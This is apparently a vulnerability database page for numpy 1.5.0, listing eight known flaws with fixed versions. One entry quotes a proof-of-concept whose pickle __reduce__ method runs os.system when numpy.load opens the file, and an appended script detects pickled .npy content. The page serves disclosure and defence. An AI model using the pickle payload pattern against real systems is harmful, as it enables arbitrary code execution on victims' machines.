numpy@1.5.0 vulnerabilities

Fundamental package for array computing in Python

  • latest version

    2.2.1

  • latest non-vulnerable version

  • first published

    18 years ago

  • latest version published

    1 day ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the numpy package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability / Vulnerable Version
    • Buffer Overflow (severity: Low)

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Buffer Overflow in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code.

    How to fix Buffer Overflow?

    Upgrade numpy to version 1.21.0rc1 or higher.

    [,1.21.0rc1)
    • Buffer Overflow (severity: Low)

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj function of fortranobject.c. This may allow an attacker to cause a Denial of Service by carefully constructing an array with negative values.

    How to fix Buffer Overflow?

    Upgrade numpy to version 1.22.0 or higher.

    [,1.22.0)
    • NULL Pointer Dereference (severity: Low)

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the PyArray_DescrNew function, which may allow attackers to conduct Denial of Service attacks by repeatedly creating and sorting arrays.

    Note: This is likely to happen only if application memory is already exhausted, since it requires the newdescr object returned by PyArray_DescrNew to be NULL.

    How to fix NULL Pointer Dereference?

    Upgrade numpy to version 1.22.2 or higher.

    [0,1.22.2)
    • Denial of Service (DoS) (severity: Low)

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core component, which may allow attackers to make the APIs fail by constructing specific string objects.

    How to fix Denial of Service (DoS)?

    Upgrade numpy to version 1.22.0rc1 or higher.

    [,1.22.0rc1)
    • Arbitrary Code Execution (severity: Critical)

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

    PoC by nanshihui:

    import os
    import pickle

    import numpy
    from numpy import __version__

    print(__version__)  # the issue affects numpy versions below 1.16.3


    class Test(object):
        def __init__(self):
            self.a = 1

        # pickle records the return of __reduce__ when serialising; on load,
        # the returned callable (os.system) is invoked with its argument ('ls')
        def __reduce__(self):
            return (os.system, ('ls',))


    tmpdaa = Test()
    with open("a-file.pickle", 'wb') as f:
        pickle.dump(tmpdaa, f)

    # not a .npy/.npz file, so vulnerable versions fall back to pickle.load
    numpy.load('a-file.pickle')
    

    How to fix Arbitrary Code Execution?

    Upgrade numpy to version 1.16.3 or higher.

    [0,1.16.3)
    • Symlink Attack (severity: Medium)

    numpy is a package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Symlink Attack. It allows local users to write to arbitrary files via a symlink attack on a temporary file.

    How to fix Symlink Attack?

    Upgrade numpy to version 1.8.2 or higher.

    [,1.8.2)
    • Denial of Service (DoS) (severity: High)

    numpy is a package for scientific computing with Python.

    Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing input validation. Passing an empty list or an empty array causes an infinite loop.

    How to fix Denial of Service (DoS)?

    Upgrade numpy to version 1.13.3 or higher.

    [,1.13.3)
    • Symlink Attack (severity: Medium)

    numpy is an array-processing package for numbers, strings, records, and objects. Affected versions of this package are vulnerable to symlink attacks.

    [,1.8.1)
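As an added example for the Arbitrary Code Execution entry above (not code from this page or from numpy), here is a stdlib-only pre-check that tells a numeric .npy file from an object-dtype one and from a file that is not .npy at all, which numpy.load before 1.16.3 handed straight to pickle.load, as the PoC relies on. The sample bytes are constructed inline; in fixed versions, numpy.load(path, allow_pickle=False), the default since 1.16.3, refuses the last two kinds.

```python
import ast
import pickle
import struct

NPY_MAGIC = b"\x93NUMPY"


def _dtype_codes(descr):
    """Yield bare type characters from a .npy 'descr' entry: a string such as
    '<i8', or a list of (name, descr[, shape]) tuples for structured dtypes."""
    if isinstance(descr, str):
        yield descr.lstrip("<>|=")[:1]
    else:
        for field in descr:
            yield from _dtype_codes(field[1])


def classify_npy(data: bytes) -> str:
    """Return 'numeric', 'object-dtype' or 'not-npy' for a file's raw bytes.
    Only 'numeric' loads without the pickle machinery; 'not-npy' is what
    numpy.load before 1.16.3 passed to pickle.load."""
    if not data.startswith(NPY_MAGIC):
        return "not-npy"
    if data[6] == 1:                     # format v1.0: 2-byte header length
        hlen, start = struct.unpack("<H", data[8:10])[0], 10
    else:                                # v2.0/v3.0: 4-byte header length
        hlen, start = struct.unpack("<I", data[8:12])[0], 12
    header = ast.literal_eval(data[start:start + hlen].decode("latin1").strip())
    if any(code == "O" for code in _dtype_codes(header["descr"])):
        return "object-dtype"
    return "numeric"


def make_npy(descr, shape, payload=b""):
    """Build a minimal v1.0 .npy file (header padded to 64 bytes) for the samples."""
    hdr = f"{{'descr': {descr!r}, 'fortran_order': False, 'shape': {shape!r}, }}"
    hdr += " " * ((-(len(NPY_MAGIC) + 4 + len(hdr) + 1)) % 64) + "\n"
    return (NPY_MAGIC + b"\x01\x00" + struct.pack("<H", len(hdr))
            + hdr.encode("latin1") + payload)


# Constructed samples: an int64 array, an object-dtype array (numpy stores its
# payload as a pickle), and a bare pickle like the PoC's a-file.pickle.
SAMPLE_NUMERIC = make_npy("<i8", (3,), struct.pack("<3q", 1, 2, 3))
SAMPLE_OBJECT = make_npy("|O", (2,), pickle.dumps(["x", "y"]))
SAMPLE_RAW_PICKLE = pickle.dumps({"not": "an array"})

if __name__ == "__main__":
    for name, blob in [("numeric", SAMPLE_NUMERIC), ("object", SAMPLE_OBJECT),
                       ("raw pickle", SAMPLE_RAW_PICKLE)]:
        print(f"{name:10s} -> {classify_npy(blob)}")
```

Run the check on untrusted files before calling numpy.load, and keep allow_pickle at its default of False so the loader itself also refuses pickled content.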